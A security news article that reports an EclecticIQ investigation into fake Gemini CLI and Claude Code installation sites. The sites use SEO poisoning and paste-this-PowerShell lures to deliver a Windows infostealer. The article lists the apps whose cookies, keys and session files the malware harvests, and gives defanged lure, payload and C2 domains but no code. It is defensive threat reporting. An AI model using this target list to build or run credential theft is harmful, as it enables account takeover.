New Malicious Campaign Exposed: Cyber Actors Create Fake Google Gemini and Anthropic Claude Code Sites to Distribute Infostealer Malware
Security researchers at EclecticIQ have recently identified a new and concerning malicious campaign. This operation involves threat actors who have crafted counterfeit websites that masquerade as Google Gemini’s coding tool and Anthropic’s Claude Code. The ultimate objective of these fake sites is to disseminate information-stealing malware.
The alarm was first raised by an independent security researcher, known by the handle @g0njxa on social media platforms. On April 21, @g0njxa took to X, formerly known as Twitter, to issue a warning about an impersonation campaign that exploits the Gemini command line interface (CLI). This feature permits developers to interact seamlessly with Gemini AI models directly from their terminal, making the impersonation especially dangerous.
Following this initial alert, EclecticIQ’s team decided to take a deeper look into the campaign based on the findings presented by @g0njxa. Their investigation revealed that the malicious domains associated with this threat began to emerge as early as March 2026.
Further analysis indicated that this campaign appears to be geographically tailored, targeting users specifically in the United States and the United Kingdom. This is evidenced by the attackers’ selection of top-level domains such as .co.uk, .us.com, and .us.org, which are commonly associated with these regions.
Infostealer Capabilities
In order to attract their intended victims, the threat actors employed SEO poisoning techniques. This strategy involves manipulating search engine results to elevate the fake domains above legitimate ones, effectively guiding unsuspecting users to compromised infrastructures that mimic the authentic installation pages for these AI tools.
Once targeted individuals access these domains, they are ultimately met with an infostealer that is specifically designed to operate on Windows endpoints. This malware executes entirely in memory through PowerShell. Its primary function is to harvest sensitive information and credentials from a plethora of applications before sending the exfiltrated data, which is encrypted for security, to a command-and-control (C2) server.
The researchers at EclecticIQ pointed out that the scope of data collection by this infostealer clearly indicates a targeted approach, focusing heavily on enterprise users and developer workstations. A wide range of applications is in the malware’s crosshairs, including both Chromium-family browsers—such as Chrome, Edge, and Brave—and Firefox. It diligently extracts login credentials, session cookies, autofill data, and browsing history.
In addition to web browsers, the malware targets ubiquitous collaboration and communication tools that are standard in corporate environments. Among the platforms targeted are:
- Slack: Local state key extraction and network cookies
- Microsoft Teams: EBWebView cache cookies stored in LocalAppData, along with the ability to decrypt DPAPI-protected local states
- Discord: Local storage LevelDB files and local state
- Mattermost: Session cookies and local state
- Zoom: DPAPI-protected keys extracted from the Zoom.us.ini file
- Telegram Desktop: The tdata session directory
- Various Platforms: Including LiveChat, Notion, and Zoho Mail Desktop, with a focus on session cookies and partitioned storage data.
According to EclecticIQ, acquiring a session cookie or local state key from any of these applications provides the attacker with authenticated access to the victim’s workspace. This access includes internal channels, shared files, client communications, and connected integrations.
Moreover, the infostealer gathers additional information from remote access tools, OpenVPN configuration files, cryptocurrency wallets, cloud storage (including services like Proton Drive, iCloud Drive, Google Drive, MEGA, and OneDrive), as well as user files and system metadata. One of the most alarming features of this malware is its ability to enable remote code execution, allowing attackers to perform arbitrary tasks on the compromised device. Financially motivated cybercriminals often utilize this capability to escalate their attacks, leading to more invasive intrusions.
Gemini CLI Attack Chain
Victims who inadvertently think they are visiting the authentic Gemini CLI are misled to a fraudulent installation page, geminicli[.]co[.]com, which superficially offers legitimate installation instructions. The page then instructs users to paste a PowerShell command into their terminal. Upon execution, the command connects to gemini-setup[.]com to download the infostealer downloader payload.
After the download is complete, the infostealer connects to a C2 server hosted at events[.]msft23[.]com, which is used to receive the exfiltrated data from the compromised systems.
Claude Code Attack Chain
On March 30, researchers at EclecticIQ identified the registration of two additional domains that impersonate Claude Code: claudecode[.]co[.]com and claude-setup[.]com. Following a similar pattern to that of the Gemini CLI impersonation, the malicious domain claudecode[.]co[.]com hosts a page that mimics Anthropic’s official documentation visually. This page also instructs users to execute a PowerShell command for ‘installation,’ whereas claude-setup[.]com serves as the host for the final payload.
Once executed, the infostealer sends the collected data to events[.]ms709[.]com, which functions as the C2 server for the Claude Code impersonation campaign. The similarities between these two attack chains strongly imply that a single threat actor is orchestrating both operations.
Conclusion
In summary, the emergence of this malicious campaign serving as a catalyst for infostealing attacks highlights the ongoing need for vigilance among users, particularly those in enterprise settings. The sophistication and targeting of these attacks underscore the importance of adopting robust security practices to safeguard sensitive information from such nefarious activities. The digital landscape is fraught with threats, making it imperative for both individuals and organizations to remain informed and proactive in their cybersecurity efforts.